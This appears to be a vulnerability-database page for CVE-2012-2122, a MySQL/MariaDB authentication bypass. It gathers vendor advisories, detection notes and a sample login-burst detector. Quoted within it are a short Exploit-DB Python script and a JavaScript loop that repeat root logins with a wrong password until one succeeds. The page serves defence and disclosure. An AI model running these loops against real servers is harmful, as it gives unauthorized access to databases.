CVE-2012-2122
Published 2012-06-26
Priority P268 · medium · 5.1 (CVSS 2.0) · AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 96.19% (99.9th percentile)
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mariadb | mariadb | — | — |
Detection & IOCs (extracted from sources)
command: for (let i = 1; i <= 1001; i++) { const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); }
- The attack works by repeatedly authenticating with the same incorrect password in a loop (up to ~1000+ attempts); detection should look for a high volume of failed MySQL authentication attempts from a single source IP followed by a successful login.
- The vulnerability is in sql/password.c check_scramble(); monitor for successful MySQL logins immediately following a burst of authentication failures from the same client, especially on port 3306.
- The exploit loops up to 1001 authentication attempts with a known-wrong password ('wrong' or 'blah'); a Snort/Suricata rule counting MySQL handshake attempts exceeding a threshold from one source within a short window would detect this.
- The glibc x86_64 SSE4 optimized memcmp() is the specific implementation that triggers the bug; affected systems are those running recent glibc on x86_64 where MySQL calls the system memcmp() rather than a gcc builtin.
- Use the Nuclei template matcher condition 'success == true' after iterating up to 1001 login attempts with a wrong password against MySQL port 3306 to confirm exploitability.
- The vulnerability only triggers on systems where the system memcmp() implementation can return values outside the -255..255 range; Red Hat Enterprise Linux 4, 5, and 6 MySQL packages are NOT affected because they use a gcc builtin for check_scramble() rather than the glibc SSE4 memcmp().
- The bug has existed in the MySQL code base since version 4.x but only manifests as exploitable when paired with a memcmp() implementation returning values outside the -255..255 range (e.g., glibc x86_64 SSE4 on Fedora/recent distros).
- The Nuclei template requires the pre-condition isPortOpen(Host, Port) on port 3306 before attempting the brute-force authentication loop; max-request is set to 1 at the template level but the JS code loops up to 1001 times internally.
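The correlation described in the first two notes above (a burst of failed logins from one client followed by a success), as an added example that is not part of the original page or of any listed source. It assumes authentication events have already been normalized to the constructed line format `<ISO time> <source IP> <account> <FAIL|OK>`, which is not a native MySQL log format; the threshold and window are assumed values to tune locally.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

T0 = datetime(2012, 6, 12, 9, 0, 0)

def constructed_events():
    """Constructed sample lines: '<ISO time> <src ip> <account> <FAIL|OK>'."""
    lines = []
    def add(offset_s, src, user, outcome):
        ts = (T0 + timedelta(seconds=offset_s)).isoformat()
        lines.append(f"{ts} {src} {user} {outcome}")
    for i in range(300):                      # burst of wrong-password attempts
        add(i * 0.1, "203.0.113.7", "root", "FAIL")
    add(30.0, "203.0.113.7", "root", "OK")    # ...then the same client gets in
    for i in range(2):                        # ordinary typo, then correct login
        add(5 + i * 4, "198.51.100.4", "app", "FAIL")
    add(15, "198.51.100.4", "app", "OK")
    for i in range(100):                      # noisy guessing that never succeeds
        add(40 + i * 0.2, "192.0.2.9", "root", "FAIL")
    return lines

def find_bypass_candidates(lines, min_failures=20, window=timedelta(seconds=60)):
    """Flag a success preceded by >= min_failures failures from the same
    source and account inside the window (both values are assumptions)."""
    events = []
    for line in lines:
        ts, src, user, outcome = line.split()
        events.append((datetime.fromisoformat(ts), src, user, outcome))
    events.sort(key=lambda e: e[0])
    recent = defaultdict(deque)               # (src, user) -> failure timestamps
    alerts = []
    for ts, src, user, outcome in events:
        q = recent[(src, user)]
        while q and ts - q[0] > window:       # drop failures older than window
            q.popleft()
        if outcome == "FAIL":
            q.append(ts)
        elif outcome == "OK":
            if len(q) >= min_failures:
                alerts.append({"src": src, "user": user,
                               "failures": len(q), "success_at": ts})
            q.clear()                         # a login resets the streak
    return alerts

if __name__ == "__main__":
    for alert in find_bypass_candidates(constructed_events()):
        print(alert)
```

Only the first client is reported: the account with two mistyped passwords stays under the threshold, and the source that never succeeds is ordinary guessing noise rather than a bypass candidate.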
CVSS provenance
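| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 5.1 | MEDIUM | — |
| vendor_ubuntu | — | 5.1 | MEDIUM | — |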
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-06-11·CVSS 5.1
CVE-2012-2122 [MEDIUM] MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
It was discovered that certain builds of MySQL incorrectly handled password
authentication on certain platforms. A remote attacker could use this issue
to authenticate with an arbitrary password and establish a connection.
(CVE-2012-2122)
MySQL has been updated to 5.5.24 in Ubuntu 12.04 LTS. Ubuntu 10.04 LTS,
Ubuntu 11.04 and Ubuntu 11.10 have been updated to MySQL 5.1.63. A patch to
fix the issue was backported to the version of MySQL in Ubuntu 8.04 LTS.
In addition to additional security fixes, the updated packages contain bug
fixes, new features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html
http://dev.mysql.
Red Hat
mysql: incorrect type cast in check_scramble() leading to authentication bypass
vendor_redhat·2012-06-09·CVSS 5.1
CVE-2012-2122 [MEDIUM] CWE-704 mysql: incorrect type cast in check_scramble() leading to authentication bypass
Statement: This issue does not affect MySQL as shipped with Red Hat Enterprise Linux 4, 5, or 6. For a technical explanation please see https://bugzilla.redhat.com/show_bug.cgi?id=814605#c19
Package: mysql (Red Hat Enterpr
GHSA
GHSA-4qx9-mwf7-7cx8: sql/password
ghsa_unreviewed·2022-05-17
CVE-2012-2122 [MEDIUM] CWE-287 GHSA-4qx9-mwf7-7cx8: sql/password
No detection rules found.
Exploit-DB
MySQL - Authentication Bypass
exploitdb·2012-06-12
CVE-2012-2122 MySQL - Authentication Bypass
---
#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
Nuclei
MySQL - Authentication Bypass
nuclei·CVSS 5.1
CVE-2012-2122 [MEDIUM] MySQL - Authentication Bypass
Template:
id: CVE-2012-2122
info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12,
Bugzilla
mysql: Oracle CPU July 2012
bugzilla·2012-06-15·CVSS 5.1
[MEDIUM] mysql: Oracle CPU July 2012
This bug is for Oracle Critical Patch Update Advisory - July 2012 planned to be released on July 17 and that is expected to list several MySQL flaws:
http://www.oracle.com/technetwork/topics/security/alerts-086861.html
So far, MySQL versions 5.1.63, 5.5.23, 5.5.24, and 5.5.25:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-23.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-25.html
were released in the last CPU in April 2012:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
which covered fixes in version 5.1.62 and 5.5.22. Apr 2012 CPU is covered by bug #832477.
This bug attempts to list issues that were already mad
Bugzilla
CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass [fedora-all]
bugzilla·2012-06-11·CVSS 5.1
CVE-2012-2122 [MEDIUM] CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.
Bugzilla
CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
bugzilla·2012-04-20·CVSS 5.1
CVE-2012-2122 [MEDIUM] CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
MariaDB upstream reported a flaw in MySQL server's check_scramble() function that is used to check user passwords during authentication. The memcmp() function return value of type int was cast to my_bool (char) type, which could result in 0 being returned by check_scramble() in cases when memcmp() returned non-0.
On systems where system memcmp() implementation can return values that do not fit into an int type, this flaw could allow (possibly remote) attackers able to connect to mysql port or socket to easily bypass password authentication.
MySQL upstream bug report:
http://bugs.mysql.com/bug.php?id=64884 (private)
MariaDB upstream patch and bug report:
https://bazaar.launchpad.net/~maria-capt
arXiv
AgentCyTE: Leveraging Agentic AI to Generate Cybersecurity Training & Experimentation Scenarios
arxiv_fulltext·2025-10-29
Ana M. Rodriguez*,
Jaime Acosta*,
Anantaa Kotal*,
and Aritran Piplai*
Dept. of Computer Science, The University of Texas at El Paso, El Paso, TX, USA
*These authors contributed equally to the work.
## Abstract
Designing realistic and adaptive networked threat scenarios remains a core challenge in cybersecurity research and training, still requiring substantial manual effort. While large language models (LLMs) show promise for automated synthesis, unconstrained generation often yields configurations that fail validation or execution. We present AgentCyTE, a framework integrating LLM-based reasoning with deterministic, schema-constrained netw
http://bugs.mysql.com/bug.php?id=64884
http://kb.askmonty.org/en/mariadb-5162-release-notes/
http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
http://seclists.org/oss-sec/2012/q2/493
http://secunia.com/advisories/49417
http://secunia.com/advisories/53372
http://security.gentoo.org/glsa/glsa-201308-06.xml
http://securitytracker.com/id?1027143
http://www.exploit-db.com/exploits/19092
http://www.securityfocus.com/bid/53911
https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql